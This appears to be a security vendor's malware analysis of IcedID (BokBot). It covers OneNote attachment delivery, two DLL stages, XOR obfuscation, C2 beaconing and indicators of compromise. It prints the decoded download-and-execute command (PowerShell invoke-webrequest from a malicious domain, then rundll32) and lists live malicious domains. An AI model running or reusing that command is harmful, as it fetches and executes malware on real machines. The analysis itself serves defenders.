IcedID (BokBot): From banking trojan to backdoor

Summary

  • First discovered in 2017
  • Has evolved from banking trojan to backdoor
  • Uses malicious email attachments — a OneNote document containing scripts that will download a DLL file
  • Has two stages, both Win64 DLL files written in C\C++
  • Executed via command line using run32dll.exe

Introduction

IcedID, also known as BokBot, was initially a banking trojan when it was discovered in 2017. Now it is mostly used as an initial access broker for other malware. This malware typically uses malicious email attachments to infect victims' machines. It has been known to use various types of attachments — such as archives, Word and Excel files — but the latest attacks used OneNote files.

Technical details

Delivery

As OneNote files don’t support macros, IcedID must use alternative tactics. Upon opening the document, the victim will see the following text and button:

Acronis

By moving this button, we can see that there are many attachments hidden behind it. These attachments can be HTA or CMD files.

Acronis

Upon pressing the button, OneNote warns that the attachments could harm the computer.

Acronis

Here is an example of an HTA file which is used to download and execute the IcedID malware. It connects to the stored URL and downloads two files, saving them on the computer. It then executes both files.

Acronis

In addition to HTA files, CMD files can be attached. Here is an example of a script. It is encoded and replaces specific strings with symbols:

Acronis

This creates the following commands:

powershell  invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\programdata\COIm.jpg

rundll32  c:\programdata\COIm.jpg,init

Execution

First stage

Although the downloaded file appears to be in the .png format, it’s actually a Win64 DLL file written in C\C++.

Acronis

If the OneNote file contains an HTA file, it also downloads a PDF and opens it automatically. This file isn’t itself malicious, and contains banking data to convince the victim of its legitimacy.

Acronis

During execution, the first stage loads and decrypts a segment which can be seen only during the debugging process. Although this sample has many imported functions, some of them are obfuscated and loaded during execution:

Acronis

IcedID loads another segment to the register and calls it.

Acronis

Here it loads more imports and libraries, but in a different way. It loads some variables in the HEX format and decodes it using an XOR operation. This approach is used very often in the code. The key is different for each piece of data that must be decoded.

Acronis

The results are names of libraries that will be used later.

Acronis

IcedID then creates a thread that will do the main work.

Acronis

It loads the URL to the remote server:

Acronis

Then it obtains some information about network adapters:

Acronis

IcedID also collects information about the user and PC, using these functions:

NetWkstaGetInfo
GetComputerNameW
GetUserNameW
LookupAccountName
ConvertSidToStringSidA
Cpuid
RtlGetVersion
GetProductInfo
GetNativeSystemInfo
NetGetJoinInformation

Then it connects to the server:

Acronis

IcedID sends a packet that includes the previously collected information. This is probably used to determine which version of the malware is appropriate for the victim’s system.

Acronis

It starts to receive a lot of packets, at 1460 bytes each.

Acronis

Other files are downloaded as well — the first is a DLL file, and the second is a DAT file. IcedID also creates a copy of the DLL file and saves it to the %Temp folder as a DAT file.

Acronis

Second stage

The downloaded second stage is also a Win64 DLL file and is written in C\C++.

Acronis

This is executed via command line with the following arguments:

rundll32.exe"C:\Users\Flare\AppData\Roaming\Onuy\honuom64.dll",#1--ha="AbleIvory\license.dat"

The command line argument ‘#1’ indicates the function with ordinal 1 in the DLL. In this case, this is the ‘init’ function. The realization of this function is different from the first stage, but the functionality is similar. It decrypts and loads an additional segment named Init.dll. This operation also executes in the memory fragment, which is only available during the debugging process.

Acronis

It creates a new thread and suspends the main one:

Acronis

Next, IcedID obtains additional imports. It loads saved data in the HEX format and decrypts it using an XOR operation, like in the first stage.

Acronis

The result will be library names:

Acronis

IcedID decrypts more data in the same fashion. The result is file names and URLs, but the malware did not connect to these during execution.

Acronis

One more decoded block of data contains the following imported libraries and functions:

RegCloseKey, RegOpenKeyExA, RegQueryValueExA, CryptAcquireContextW, CryptReleaseContext, CryptGetHashParam, CryptCreateHash ,CryptHashData CryptDestroyHash, GetUserNameA, GetUserNameW, OpenProcessToken, GetSidIdentifierAuthorit, GetSidSubAuthority, GetSid, SubAuthorityCount, GetTokenInformation, LookupAccountNameW, ConvertSidToStringSidA, RegCreateKeyA,.RegDeleteKeyA, RegOpenKeyA, RegSetValueExA, RegDeleteValueA, RegEnumValueA .AdjustTokenPrivilege, LookupPrivilegeValueA .CryptDestroyKey .CryptImportKey, InitiateSystemShutdownExA, CryptVerifySignatureA, RegCreateKeyExA, RegEnumKeyExA .RegQueryValueExW, CredEnumerateW, CredFree, CryptAcquireContextA ADVAPI32.dll, StrChrA, StrChrW,  StrCmpIW, SHSetValueA, StrStrA, StrStrIA, StrCmpNIA, StrToIntExA, StrToIntA, StrCmpNI, StrStrIW SHLWAPI.dll, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect,  WS2_32.dll, GetAdaptersInfo, IPHLPAPI.DLL, NetApiBufferFree, NetGetJoinInformation, NetWkstaGetInfo, NETAPI32.dll, OLEAUT32.dll, memset, vsnprintf, memcpy, msvcrt.dll, SHGetFolderPathA, SHGetFolderPathW, ShellExecuteExA, SHELL32.dll, ,sprintfA, s printfW, USER32.dll, InitSecurityInterfaceA, Secur32.dll, WinHttpCloseHandle, WinHttpQueryOption, WinHttpSetStatusCallback, WinHttpCrackUrl, WinHttpOpen, WinHttpConnect, WinHttpReadData, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpOpenRequest, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryHeader, WINHTTP.dll,  CertFreeCertificateContext, CryptUnprotectData, CRYPT32.dll, UuidFromStringA,  UuidFromString, RPCRT4.dll, CoCreateInstance, CoInitialize, CoInitializeEx, CoTaskMemFree, ole32.dll, RtlGetVersion, ZwQuerySystemInformation, NtAllocateVirtualMemory, NtWriteVir tualMemory, NtProtectVirtualMemory, RtlDecompressBuffer, ntdl,dll, Sleep, CloseHandle, GetLastError, HeapAlloc, HeapFree, GetProcessHeap, CreateMutexA, ExitProcess, GetProduct Info, lstrcpyA, GetCurrentProcessId, GetLocalTime, lstrlenA, CreateDirectoryA, CreateDirectoryW, GetTempPathA, lstrcatA, lstrcatW, lstrlenW, QueryPerformanceCounter, QueryPerformanceFrequency, SwitchToThread, GetTickCount, GetComputerNameExW, GetNativeSystemInfo, LocalFree, ReadFile, WriteFile, createPipe, PeekNamedPipe, HeapReAlloc, WaitForSingleObject, TerminateProcess, CreateProcessA, WideCharToMultiByte, GetTickCount64, DeleteFileA, lstrcmpiA, CopyFileA, SetEvent, CreateEventA, OpenEventA, CreateThread, TerminateThread, CreateFileA, CreateEventW, SleepE, QueueUserAPCInitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, MultiByteToWideChar, ExpandEnvironmentStringsA, CreateFileW, FindClose, FindFirstFileA, FindNextFileA, GetFileSize, CreateRemoteThread, RegisterWaitForSingleObject, UnregisterWait, ResumeThread, GetSystemDirectoryA, GetWindowsDirectoryA, WaitForMultipleObjects, GetModuleHandleA, GetProcAddress, SetErrorMode, SetFilePointer, LocalAlloc, LoadLibraryA, FreeLibrary, KERNEL32.dll

From these imports, we can see that the malware does not only use network-related functions; it also uses others that are responsible for interfacing with file systems, registers and processes. These functions will be used to installing further malware.

IcedID then takes the command line and extracts the argument "AbleIvory\license.dat."

It reads this file and decrypts it using an XOR operation:

Acronis

The decoded ‘license.dat’ is not a PE or DLL file, but it contains some strings used for stealing credentials from browsers’ password vaults.

Acronis

Next, IcedID prepares the information that will be sent to the server. It uses the CryptHashData() function to hide the packet content.

Acronis

Examples of the data, which will be hashed before being sent to the server:

Acronis
Acronis

IcedID connects to the saved server address:

Acronis

The sample analyzed connected to these servers:

palasedelareforma.com
renomesolar.com
sinkhole.sh

IcedID prepares a request and sends it with ‘WinHttpSendRequest’:

Acronis

It starts connecting to the server every five minutes. During the analysis, the sample didn’t do anything further; we suspect that it’s awaiting a specific command from the server to begin its primary activities — like downloading, installing and running additional malware.

Acronis

Network traffic

The first server, ‘ituitem.net,’ has an IP address of 5.61.47.8, from where the second stage was downloaded. This address is registered in Germany.

Acronis

The next IP address, 37.252.6.77, points to the malicious domain ‘palasedelareforma.com,’ registered in Poland.

Acronis

The server ‘renomesolar.com’ actually has two IP addresses, but this sample connects only to the 38.180.0.89 address, registered in France. The second one is used by other IcedID samples.

Acronis

Despite the fact that IcedID connects to the ‘sinkhole.sh’ domain, which is not malicious, the IP address 80.78.24.30 has a lot of resolved DNS servers used in other IcedID campaigns. Some of these servers have already been brought offline.

Acronis

Obfuscation

IcedID uses multiple obfuscation techniques. The main functionality is loaded during execution, so it can be viewed only during the debugging process. Secondly, it hides a full list of imports. To use them, it decodes saved data with an XOR operation and then loads them to the memory. Also, it often loads particular function offsets to one of the general registers and calls them.

Conclusion

IcedID successfully evolved from banking trojan to backdoor, and now operates as an initial access broker for other malware. This makes it potentially more dangerous, depending on which malware it delivers. Now it has many different samples, which are using different servers to communicate with, and their number is still growing.

IcedID uses malicious email attachments to gain access to victims' systems, so users must be particularly careful when opening such messages.

During our analysis, the IcedID sample didn’t download any third-party malware (perhaps because it was awaiting a particular command from the server). With good security tools, it can be spotted and terminated at the initial stage.

Detected by Acronis

Acronis Cyber Protect successfully detects and prevents execution for malicious CMD and HTA files, attached to OpenNote files, as well as both first-stage downloaders and second-stage backdoors.

Acronis

IoCs

Files

SHA256
Description
681217e6c8ed3ed37c1312646afb8e0cfe25e6840f461d10a7d9cdd4ffa725cb
CMD attachment example
03fdf03c8f0a0768940c793496346253b7ccfb7f92028d3281b6fc75c4f1558e
HTA attachment example
8d076fe2d93a9ebd5701eb7a1acab37e9d390df7f50e6d155c6c7289934d2b54
First stage downloader
dfff2ddb7d6a6881ca003ef65347e1087ba8bac32b0a62cec1174486f1f958e1
Second stage backdoor
f2ab26557364d548a40ab3c43db78e03750e8eb391258080dda31b5c3f71c1d9
licence.dat 

Network indicators

Domain
IP address
ituitem.net
5.61.47.8
palasedelareforma.com
37.252.6.77
renomesolar.com
38.180.0.89
sinkhole.sh
80.78.24.30